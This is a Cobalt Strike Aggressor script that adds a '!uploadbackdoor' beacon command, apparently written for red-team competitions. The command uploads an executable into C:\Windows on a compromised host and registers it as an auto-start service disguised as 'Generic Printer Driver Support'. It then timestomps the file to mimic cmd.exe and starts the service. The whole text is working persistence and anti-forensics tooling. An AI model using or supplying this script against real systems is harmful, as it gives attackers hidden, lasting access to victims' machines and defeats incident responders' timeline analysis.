# Uploads a persistent backdoor on a window beacon as a service
# Go to Attacks -> Packages -> Windows Executeable (S)
# Export a Windows Service EXE file
# Save the exe, something like "GenericPrinterServices.exe" works
# Inspired by: http://blog.cobaltstrike.com/2016/02/23/cobalt-strike-tips-for-2016-ccdc-red-teams/
# Load the script, then in the script console, execute with !uploadbackdoor $FULL_LOCAL_PATH_TO_SERVICE_EXE
# Und3rf10w

sub servicefilename {
	$servicebackdoorfilename = matches($1, '[\/](\w+\.\w+)$');
	$servicebackdoorfilename = $servicebackdoorfilename[0];
	return $servicebackdoorfilename;
}

alias !uploadbackdoor {
	println("\c4Uploading backdoor on beacon $1 using file $2 ");
	blog($1, "Attempting to publish backdoor service");
	bcd($1, "C:\\Windows\\");
	println("\c4Changed directory on beacon $1 to C:\\Windows\\");
	bupload($1, script_resource("$2"));
	servicefilename($2);
	bshell($1, "sc create GenericPrinterDriver binPath= \"C:\\Windows\\ $+ $servicebackdoorfilename $+ \" start= auto DisplayName= \"Generic Printer Driver Support\"");
	btimestomp($1, "$servicebackdoorfilename", "C:\\Windows\\system32\\cmd.exe")
	bshell($1, "sc start GenericPrinterDriver");
	blog($1, "Backdoor service created using $servicebackdoorfilename ");
	println("\c9[+] Backdoor creation complete!");
}

beacon_command_register (
	"!uploadbackdoor",
	"Uploads and creates a persistent backdoor to the beacon",
	"Synopsis: !uploadbackdoor [path to local service exe on your system]"
);
